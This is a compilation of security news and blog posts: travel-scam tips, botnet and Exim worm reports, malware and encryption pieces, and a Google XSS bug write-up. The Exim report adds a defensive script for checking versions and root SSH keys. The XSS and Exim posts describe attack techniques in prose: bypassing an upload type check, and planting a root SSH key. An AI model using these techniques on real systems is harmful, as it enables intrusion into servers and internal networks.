But according to research from McAfee, our need to secure a great deal to a hot destination may mean we are cutting corners and taking risks online. Over one-third of us (32%) report that we are likely to use a website we have never heard of before just because it offers great deals!

And cybercriminals are fully aware of this, so they spend a lot of time and effort creating malicious travel websites and fraudulent links to lure us ‘travel nuts’ away from the reputable online travel players. Their goal is to get us to their fraudulent site, install malware on our devices so they can steal our personal information, passwords and, ideally, our money!

How Many Aussies Have Been Scammed?

McAfee’s research also shows that 1 in 5 of us have either been scammed or nearly scammed when booking a holiday online with many of us (32%) signing up for a deal that turned out to be fake. And horrifyingly, 28% of holiday scam victims only realised that they had been scammed when checking-in to their holiday accommodation!! Can you imagine breaking the news to the kids? Or worse still having to pay twice for the one holiday?

Cybercriminals Also Have Favourite Holiday Hot Spots

Not only are cybercriminals capitalising on our need for a deal when booking a holiday, but they are also targeting our favourite destinations. The findings from McAfee’s research show holiday hot spots such as Thailand, India, the Philippines and the UK generate the riskiest search results when people are on the hunt for holidays online.

The top holiday destinations for Aussies that hackers are targeting via potentially malicious sites:

  1. New Delhi, India
  2. Bangkok, Thailand
  3. London, England
  4. Phuket, Thailand
  5. Manila, Philippines

Cybercriminals take advantage of the high search volumes for accommodation and deals in these popular destinations and drive unsuspecting users to their malicious websites often using professional looking links, pop-up ads and even text messages.

What You Can Do to Avoid Being Scammed

With the Aussie school holidays just a few weeks away, do not despair! There are definitely steps you can take to protect yourself when booking your Winter getaway. Here are my top tips:

  1. Think Before You Click

With 25% of holiday bookings occurring through email promotions and pop-up ads, it’s essential to properly research the company behind the ads before you proceed with payment. Check out reviews and travel forums to ensure it is a legitimate online travel store. And it’s always best to use a trusted online retailer with a solid reputation even if it costs a little more.

  2. Use Wi-Fi With Caution

Using unsecured Wi-Fi is a risky business when you are travelling. If you absolutely must, ensure it is secured BUT never conduct any financial or sensitive transactions when connected. Investing in a virtual private network (VPN) such as McAfee Safe Connect is the best way to ensure that your connection is secure and your data remains private.

  3. Protect Yourself

Ensuring your device has current comprehensive security protection, like McAfee Total Protection, will ensure any malicious websites will be identified when you are browsing. It will also protect your device against malware – which could come in handy if you are tricked into visiting a fraudulent site.

So, next time you come across an amazing, bargain-basement deal to Thailand, PLEASE take the time to do your homework. Is the retailer legitimate? What do the reviews say? What are the terms and conditions? And, if it isn’t looking rosy, remember, if it looks too good to be true, it probably is!

‘till next time

Alex xx


The post How to Book Your Next Holiday Online and NOT Get Scammed appeared first on McAfee Blogs.

Climbing the Vulnerability Management Mountain

The purpose of this series of blogs is to guide you on your journey up the Vulnerability Management Mountain (VMM). Like climbing a mountain, there is a lot of planning and work required, but when you get to the top, the view is amazing and well worth the journey. Your progress will depend on your […]… Read More

The post Climbing the Vulnerability Management Mountain appeared first on The State of Security.

Adding to the Toolkit – Some Useful Tools for Cloud Security

With more business applications moving to the cloud, the ability to assess network behavior has changed from a primarily systems administration function to a daily security operations concern. And whilst sec-ops teams are already familiar with firewall and network device log tools, these can be of limited used in a “cloud first” business where much […]… Read More

The post Adding to the Toolkit – Some Useful Tools for Cloud Security appeared first on The State of Security.

[Exchange Listing] CLB Token to be listed on Bitsdaq Exchange


The Cloudbric team is excited to announce that we will be adding a new exchange listing for our CLB token!

Bitsdaq exchange is an official partner of Bittrex, which is one of the premier cryptocurrency exchanges based out of the US.

Based on Bittrex’s unique exchange technology, Bitsdaq will help provide safe and reliable cryptocurrency trading activities for users based in the APAC region.

Users can also find Cloudbric’s CLB token listed on both Korea-based Bitsonic exchange, as well as BitForex which is targeted for global users.

Bitsdaq listing details:

  • Token: CLB
  • Exchange: Bitsdaq
  • Date: June (exact date will be announced on our Telegram)

For more information regarding our CLB token and new exchange listing announcements, please join our official Telegram community channel at


What is Bitsdaq?

Bitsdaq is a Hong Kong based cryptocurrency exchange based on the unique technology of its official partner, Bittrex exchange. Bitsdaq officially launched its exchange on January 29th, 2019 and currently boasts more than 2 million users with both mobile and web access for its exchange.

As an official partner of Bittrex exchange, one of the most globally recognized cryptocurrency exchanges, Bitsdaq helps expand Bittrex’s reach towards the APAC region through its unique and cutting edge technology.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Exchange Listing] CLB Token to be listed on Bitsdaq Exchange appeared first on Cloudbric.

Synack integrates crowdsourced human intelligence and AI for “smart” security testing

The debate on how we should best use Artificial Intelligence is ongoing, but no one can argue against its benefits when used to augment human work. Take self-driving cars: when Artificial Intelligence is used alongside humans, it provides features like improved safety and predictive driving. The same is true in cybersecurity; we will always need the creativity of human intelligence to beat the human adversary. However, we can also augment those humans with smart technology … More

The post Synack integrates crowdsourced human intelligence and AI for “smart” security testing appeared first on Help Net Security.

Grandstream launches new 802.11ac Wave-2 Wi-Fi access point

Grandstream, connecting the world since 2002 with award-winning unified communications solutions, announced the release of the newest addition to their GWN series of Networking Solutions. The GWN7630 is an 802.11ac Wave-2 Wi-Fi Access Point that offers dual-band 4×4:4 MU-MIMO technology and a sophisticated antenna design for maximum network throughput and expanded Wi-Fi coverage range. It supports advanced QoS, low-latency real-time applications, mesh networks, captive portals, 200+ concurrent clients per AP, 175-meter coverage range and dual … More

The post Grandstream launches new 802.11ac Wave-2 Wi-Fi access point appeared first on Help Net Security.

Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the latest victim of a sextortion attack: in a case similar to the Fappening saga, a hacker threatened the actress with the publication of her private nude photos.

The hacker first obtained nude photos of Bella Thorne, then threatened to leak the pictures online, but she gave an unsettling answer.

Bella Thorne published tweets of the stolen photos putting the hacker out of play.

The actress explained that she had been harassed for the past 24 hours by a hacker who had accessed her nude photos.


The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)

The post Bella Thorne published her private nude photos before a hacker that was threatening her appeared first on Security Affairs.

Acronis Cyber Cloud now features native integration with ConnectWise Control

Acronis, a global leader in cyber protection, announced at IT Nation Explore, ConnectWise’s partner conference, that the Acronis Cyber Cloud service provider platform will now feature native integration with ConnectWise Control. In addition, Acronis is expanding the features and functionality available in some of ConnectWise’s solutions that are already integrated with the platform. These integrations mean service providers using ConnectWise and Acronis Cyber Cloud can streamline their business and deliver new generation cyber protection services … More

The post Acronis Cyber Cloud now features native integration with ConnectWise Control appeared first on Help Net Security.

eCube Systems partners with LTCG to develop a dynamic security offering

eCube Systems, a provider of the NXTware hybrid infrastructure platform and legacy modernization tools and services, announced that it will enter into a joint venture agreement with Lima-Thompson Consulting (LTCG) to develop and market advanced security applications to Fortune 500 companies. “eCube is pleased to announce this joint venture developing an enterprise security application” says Kevin Barnes Managing Partner at eCube Systems. “With our expertise in Hybrid Infrastructure Platforms and LTCG’s in depth expertise and … More

The post eCube Systems partners with LTCG to develop a dynamic security offering appeared first on Help Net Security.

Security & Privacy Concerns in IoT Devices

Today, in the IoT era, competing systems and services are streamlined in various areas of the world, and new businesses are emerging from the ground up. In turn, whether we like it or not, people’s lives become more convenient. As we have highlighted time and time again here, convenience is a natural enemy of security. The fact that we attach Internet-dependent sensors to the things we interact with means that our personal information is more likely to be collected, either by the vendor/service provider or by some other third party. That is to say, there is the danger of someone watching over our daily activities, our habits and the data we create.

Where personal information is stored, it is drawn out, analyzed and used by unknown parties because it is so easily available. One reason IoT has become a problem is that these devices are relatively easy to buy. There are devices that are likely to cause serious problems if operated by an unauthorized user, such as IP cameras that are left running 24/7 with an Internet connection. The same goes for medical equipment and new car models such as those released by Tesla. We are highly dependent on “convenient” technology, without fully understanding the implications of our purchase for our personal privacy and data security.

For cybercriminals, the motivation is directly linked to money. Vulnerable machines that seldom receive patches and security updates, such as ATMs, are very much exposed to possible attacks. The POS terminals used by various merchants, which used to be just a direct link from the POS device to the bank’s systems, are now connected to the Internet, which is especially convenient for customers who use Visa or Mastercard services.

The IoT devices in offices and private homes directly conflict with how we have treated computing. Today safety can only be assured through an air gap: basically, in order to minimize the chance of becoming a victim of cybercriminals, the only reliable solution is to disconnect from the Internet. Online users still need security assurance, but it requires a different approach, as working offline is not really an option for them; a dedicated machine with an Internet connection is always required.

Acquisition of IoT needs to be studied thoroughly: is it really needed by the office? There is still no standard when it comes to these devices, as Google’s Android Things and Microsoft Azure Sphere are still competing for domination in the IoT space. IoT devices also have weaker processors (SoCs), in fact much less sophisticated than an entry-level smartphone. Such hardware cannot host complex apps like antivirus software; as we have learned the hard way, installing an antimalware product increases system resource usage, which a weak computing device cannot provide.

At the very least, if a firm decides to embrace the IoT revolution, such devices need to be behind a hardware firewall. Giving them a connection that is physically separate from the main corporate network, with only a plain Internet connection behind a NAT, will greatly improve their security. IoT vendors also issue regular firmware updates for their devices, and these updates contain bug fixes and security patches; a system administrator worth his salt will not delay updates for IoT devices.


The post Security & Privacy Concerns in IoT Devices appeared first on .

Brinqa appoints Will Droste as CTO

Brinqa, the pioneer in knowledge-driven cyber risk services, announced it has named former Sun Microsystems and Arris technology leader Will Droste as its new Chief Technology Officer (CTO). Droste will lead the company’s Technology Innovation Center and drive the continued growth of the Brinqa Cybersecurity Ecosystem, reporting directly to CEO Amad Fida. “Getting more out of their security investments is top of mind for organizations around the globe and requires a knowledge-driven conversation,” said Amad … More

The post Brinqa appoints Will Droste as CTO appeared first on Help Net Security.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked as Echobot, appeared in the threat landscape; its operators are adding new exploits to infect a broad range of systems, including IoT devices and the enterprise apps Oracle WebLogic and VMware SD-WAN.

The Echobot botnet was first detected by experts at Palo Alto Networks early this month; the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators had added 8 new exploits, but currently it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The experts pointed out that it was not simple to determine the vulnerabilities being exploited by the botnet because some of them had no CVE numbers assigned.

After they contacted MITRE, the organization assigned them identification numbers.

Below is the list of the exploits included in the Echobot variant discovered by the expert; some of the flaws triggered by the bot are decade-old vulnerabilities:


The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect as many systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Top 5 Encryption Software to Securely Encrypt Your Files in the Cloud

These past few years, the insurance industry has expanded its market to cover tech-related damages. Those who signed up for insurance plans under this new scheme can claim damages if they lost productivity due to malware attacks, phishing schemes, or social engineering. However, it is better never to become a victim yourself: aside from reliable backups that can easily restore lost files, encryption is key to keeping files private. Encrypted files stored in the cloud are safe from hackers, given that what is stored there is actually just a binary blob of scrambled data.

Here, we highly recommend a combination of encryption solutions in order to maximize data privacy. This combination is composed of two parts:

  • Storage device encryption

As the name implies, this covers the lockdown of the actual storage hardware. Full disk encryption helps prevent outsiders from viewing the contents of the hard drive without the proper authentication that unscrambles the stored files. Encrypted hard drives are usually required for mobile corporate users, as the chance of their laptops being stolen or lost is always a real possibility.

  • File & Folder encryption

This locks down specific files and folders in order to maintain privacy. These encrypted files can be uploaded to a NAS or to a cloud-storage account without any worry of data leaks should the storage be accessed by outsiders.

We highly recommend the use of both Storage device and File & Folder encryption tools in order to lock down the actual storage device (for local storage) and individual files/folders (for cloud-based storage). The below data encryption solutions are the most common and known to be safe to use:

1. AESCrypt

This is a very well known encryption solution for locking down files and folders. Its claim to fame is its cross-platform support, with versions compatible with Linux, MacOS, and Windows. AESCrypt supports scripting using the C# and Java languages, and best of all it is released to the public as an open-source project. Being open source means the program can be audited by any interested party. AESCrypt provides either 256-bit or 128-bit AES encryption. Being open source, it has no user or installation restrictions; it can be used by casual users and professionals alike.

2. AxCrypt

This file and folder encryption software is a veteran in the Industry, with variants that support Windows as old as Windows 98. AxCrypt integrates itself to Windows Explorer, enabling users to selectively encrypt and decrypt files and folders just by right-clicking them. A version for MacOS is also available which also integrates itself to Finder. Aside from that, it is also available for Android, installing it enables mobile users to enjoy the protection provided by the 256-bit AES encryption standard while highly integrating itself with Google Drive or DropBox if installed.

3. Windows Bitlocker

Microsoft bundles a built-in full disk encryption software on all “Professional” or above editions of Windows since Windows Vista. This is used by many organizations and large multinational companies, as they have volume licensing for Windows Professional Editions. The good thing for using Windows BitLocker is as part of the operating system, it continues to receive updates and refinements through Windows Auto Update. BitLocker is exclusively only for Windows and cannot be installed on other platforms.

4. File Vault

This is the counterpart of BitLocker for the MacOS platform. With File Vault rolled-out, MacOS system disk itself is locked down using 256-bit AES key. This prevents the hard drive (or SSD) from being booted and accessed even on another Mac computer. File Vault is exclusively a MacOS encryption app.

5. VeraCrypt

This is the spiritual successor of the open source encryption software TrueCrypt, which was abandoned at version 7.1. VeraCrypt provides cross-platform full disk encryption, with versions available for download for Windows, MacOS, and Linux. Decryption is automatic once the correct user credentials are provided, as VeraCrypt uses a virtual encrypted disk in order to smoothly integrate the encrypted storage for user files into the operating system.


The post Top 5 Encryption Software to Securely Encrypt Your Files in the Cloud appeared first on .

Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that already compromised some Azure installs.

Bad actors continue to target cloud services in the attempt of abusing them for several malicious purposes, like storing malware or implementing command and control servers.

Microsoft Azure is not immune, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

Researchers already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that already compromised some Azure installs.

Recently, security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. Different groups of hackers are exploiting the CVE-2019-10149 flaw to take them over.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.


The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and is caused by improper validation of recipient addresses. It leads to remote code execution with root privileges on the mail server, and it is trivially exploitable by a local attacker and by a remote attacker in certain non-default configurations.

The flaw was addressed by the Exim development team with the release of version 4.92 in February 2019, but a large number of servers were still running affected versions. Note that some distributions backport the fix without changing the upstream version number, so check the package changelog rather than relying on the version string alone.

“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers scan the Internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script that checks whether OpenSSH is installed on the machine.

If OpenSSH is not present, the script installs and starts it, then adds an attacker-controlled RSA public key so that the attackers can log in as root over SSH with key-based authentication.

Microsoft has now detected a Linux worm that leverages the same flaw against vulnerable Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this worm, but warns customers to keep their software up to date to prevent infection.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”
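Two checks a practitioner would run on a host in scope for this worm, as an added example that is not code from Microsoft, Cybereason or the Exim project: classify the version string printed by `exim -bV` against the 4.87 to 4.91 range, and list entries in root's authorized_keys whose key material is not on an allow-list, since the attackers persist by adding their own RSA key. The banner and authorized_keys contents in the block are constructed test data, and the key blobs are not real keys.

```python
"""Two checks for the CVE-2019-10149 worm: is this Exim build in the affected
range, and has root's authorized_keys gained a key the admin did not provision?

Added example (not code from Microsoft, Cybereason or the Exim project). The
banner and authorized_keys text below are constructed test inputs; on a real
host the banner comes from `exim -bV` (`exim4 -bV` on Debian/Ubuntu) and the
key file is /root/.ssh/authorized_keys.
"""
import re
from typing import List, Optional, Tuple

AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)          # 4.92 contains the fix

_VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)")
# Token prefixes that identify the key-type field of an authorized_keys line.
_KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def parse_exim_version(banner: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) from `exim -bV` output, or None if absent."""
    m = _VERSION_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_affected(version: Tuple[int, int]) -> bool:
    """True for upstream versions 4.87 through 4.91 inclusive.

    Caveat: distributions sometimes backport the patch without bumping the
    upstream version, so read 'affected' as 'check the package changelog'."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def classify_banner(banner: str) -> str:
    """'affected', 'not affected' or 'unknown' for a full `exim -bV` banner."""
    v = parse_exim_version(banner)
    if v is None:
        return "unknown"
    return "affected" if is_affected(v) else "not affected"


def unexpected_keys(authorized_keys: str, allowed_blobs: List[str]) -> List[str]:
    """Return the comment (or a blob prefix) of every authorized_keys entry
    whose base64 key material is not in the allow-list.

    The key-type token is located by scanning, so entries with a leading
    options field (e.g. command="...") are handled as well as plain ones.
    Lines that cannot be parsed are reported too rather than silently skipped."""
    found = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t.startswith(_KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(tokens):
            found.append(line)
            continue
        blob = tokens[idx + 1]
        if blob not in allowed_blobs:
            comment = " ".join(tokens[idx + 2:]) or blob[:16] + "..."
            found.append(comment)
    return found


# Constructed sample inputs (not a real host, not real keys).
SAMPLE_BANNER = (
    "Exim version 4.91 #1 built 12-Mar-2019 17:46:18\n"
    "Copyright (c) University of Cambridge, 1995 - 2018\n"
)
SAMPLE_AUTHORIZED_KEYS = """# admin key provisioned by configuration management
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeAdminKeyBlob0000000000000000000000 admin@bastion
command="/bin/false" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfakeRSAblob0000000 worm@nowhere
"""
ALLOWED_BLOBS = ["AAAAC3NzaC1lZDI1NTE5AAAAIFakeAdminKeyBlob0000000000000000000000"]


if __name__ == "__main__":
    print("exim build:", classify_banner(SAMPLE_BANNER))
    print("unexpected root keys:", unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_BLOBS))
```

Run it with the real output of `exim -bV` (`exim4 -bV` on Debian and Ubuntu) and the real /root/.ssh/authorized_keys. A version in range is a reason to check the package changelog rather than a proof of vulnerability, because distributions backport fixes without changing the upstream version; an unknown key in root's file, on the other hand, warrants incident response whatever the version says.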

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)

The post Linux worm spreading via Exim servers hit Azure customers appeared first on Security Affairs.

Week in review: DevSecOps readiness, human bias in cybersecurity, Linux servers under attack

Here’s an overview of some of last week’s most interesting news and articles:

CISO do’s and don’ts for board reporting

Security is no longer just a job for IT – it impacts all areas of a business, from brand perception to the bottom line. As a result, CISOs are increasingly being asked to deliver cybersecurity reports to their boards, including information on global trends, security performance, security strategy, and security spend.

Vulnerabilities allow attackers to …

The post Week in review: DevSecOps readiness, human bias in cybersecurity, Linux servers under attack appeared first on Help Net Security.

New Hybrid Computing, Same Security Concerns

Pulse Secure, in cooperation with IDG Connect, has released its 2019 State of Enterprise Secure Access research report, detailing how cloud computing has changed companies’ daily operations and how secure the vendor platforms are. The business world is slowly migrating its applications and day-to-day activities from decade-old on-premises servers to the cloud. That ultimately means the Internet, once considered an “external network”, is now the direct computing platform for storing files and hosting desktop applications.

In the report, Pulse Secure highlights the importance for companies large and small of implementing Zero Trust across the board: a policy model in which every user and device must be verified before any permission is granted. This goes hand in hand with effective identity management, device management and secure protocols. The report also recognizes that the mobile workforce is here to stay, and that technologies such as VPNs (Virtual Private Networks) are heavily used to provide some level of privacy and security for corporate mobile users.

The study, conducted by the IDG Connect and Pulse Secure partnership, surveyed 300 senior IT leaders from Germany, Switzerland, Austria, the United States and the UK to measure the IT security challenges in their companies’ daily operations, their software and hardware deployment strategies, their confidence that risks can be mitigated in time, and the methodology used to decide which products and services to adopt to “fortify corporate security”.

Years ago, most organizations depended heavily on the company’s local data center for storage, while applications were still loaded from local PC hard disks. More and more organizations now depend on public and private cloud services to simplify the deployment of critical applications.

Planned IT delivery investment

Pulse Secure reports that 63% of the IT professionals and leaders surveyed are increasing their dependence on public and private cloud infrastructure, a trend that started last year and continues in 2019. Organizations are moving away from purely desktop-based applications and local file hosting toward cloud storage and cloud-based apps that mirror what they used to do with desktop software.

Top 5 access security incidents with significant to high impact

The report also featured how the 300 IT security leaders view the problems surrounding corporate IT. The top IT security and privacy concerns raised by them are:

  1. Malware
  2. Unauthorized/vulnerable endpoint use
  3. Mobile or web app exposure
  4. Unauthorized data and resource access by insecure endpoints or privileged users
  5. Unauthorized app/resource access including lax authentication or encryption

The report also lists high-impact gaps that push organizations toward a quick fix, something that rarely exists in the real world:

  • Poor user, device discovery and mobile computing exposure
  • Application availability
  • Uncoordinated authorization
  • Inconsistent, incomplete enforcement, weak device access and configuration compliance
  • Security gateway sprawl, inconsistent/incomplete remediation

“Our survey suggests that the majority of respondents are experiencing issues in application availability (81%) in terms of ensuring responsiveness and reliable access for users. This may suggest a need to improve application usage analytics and load balancing automation,” the report summarized.


Modular Malware In The Nutshell

We are in an age of computing where programs grow toward feature-richness at best and bloatware at worst. Malware is software too, and its developers have access to the same development environments as the developers of legitimate software. They also noticed their malware turning into bloatware as they kept adding features whose only purpose was to bypass anti-malware products. And that is without starting the discussion of how the anti-malware industry itself has produced bloated antivirus and endpoint products for the last ten years.

The larger the malware, the easier it is to detect, both by antivirus products and by the keen observation of experienced system administrators. So what did malware authors do? They split their big malware into smaller chunks: a main module containing “calls” that download sub-modules, each of which performs other tasks for the malware. We covered VPNFilter last year, a modular malware that infects the firmware of home and small-office routers and NAS devices.

VPNFilter sidesteps the antivirus checks on PCs because it lives on the router rather than on the endpoint, and fetches only the sub-modules it needs. Ten years ago such a capability was science fiction for malware; the need to survive drove its development. Years ago there were cases of malware hiding itself in the BIOS firmware of computers and video cards. Today’s UEFI (Unified Extensible Firmware Interface), with signed updates and Secure Boot, makes writes to the firmware area harder, although not impossible: UEFI implants such as LoJax were documented in 2018.

The typical recommendation of rebooting the router only removes VPNFilter’s later stages; its first stage persists across reboots and simply downloads them again, which is exactly what the staged, modular approach is for. Only a factory reset followed by a firmware update removes it, and a router left on flawed firmware will be reinfected from the Internet. What VPNFilter started has continued: the start of 2019 marked the detection and identification of 150,000 modular malware samples in the wild.

Security researchers expect more modular malware in the months and years to come. The good news is that, because sub-modules must be downloaded from command and control (C&C) servers, authorities can shut those servers down for good, which would make modular malware short-lived; that, at least, is the hope. However, malware development does not happen in isolation: thousands of new variants are developed every single day, and it is impractical to replicate the FBI’s success in taking down the C&C of every modular malware that is discovered.

What are the practical ways to lessen the chance of contracting modular malware? The practical answer is to follow safe computing practices:

  1. Be suspicious of pop-ups, pop-unders and website redirectors. These are the behaviours Google itself is trying to stop with a feature in Chromium-based browsers that blocks such actions by any website. A well-behaved site does not use pop-ups, pop-unders or redirectors.
  2. Never neglect firmware updates for your home router, operating system and any Internet-facing apps. These updates include the critical patches that prevent known vulnerabilities from being exploited.
  3. Never neglect a credible backup habit. The target can be a network share, a NAS box or the cloud. It is also strongly recommended to encrypt files locally before uploading them, to minimize the damage if the cloud provider is ever breached.
  4. Establish reliable network monitoring (SNMP-based or otherwise) that tracks open ports and the external IP addresses your network communicates with over the public Internet. It is costly for an organization to set this up well, but it is an investment worth making: it is far cheaper to spend on security than on damage control after an incident.


Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China on phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows attackers to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDoS attack hit Telegram, company says most of the junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing YubiKey FIPS devices for free due to a security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to Google’s internal network.

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to part of Google’s internal network.

The Google Invoice Submission Portal is a public portal used by Google’s business partners to submit invoices.

An attacker could also have exploited the flaw to steal Google employees’ cookies for internal apps, hijack their accounts or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded crafted files to the Google Invoice Submission Portal via the Upload Invoice field.

The expert noticed that the upload feature, meant for invoices in PDF format, could be abused to upload HTML files: the attacker only had to intercept the upload request and change the uploaded file’s filename and Content-Type to HTML.

Using this trick it was possible to store a malicious file in Google’s invoicing system that would execute automatically when an employee opened it.

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file containing an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email showing that the JavaScript in the XSS payload had executed on the domain.

This domain is used by Google to host internal websites and apps. Anyone attempting to access it is redirected to a Google Corp login page that requires Google employee credentials.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, the flaw could have been exploited to run arbitrary JavaScript in the context of Google employees’ sessions and gain access to sensitive information.

The expert pointed out that many Google internal apps are hosted on that domain, making this issue a gift for attackers.
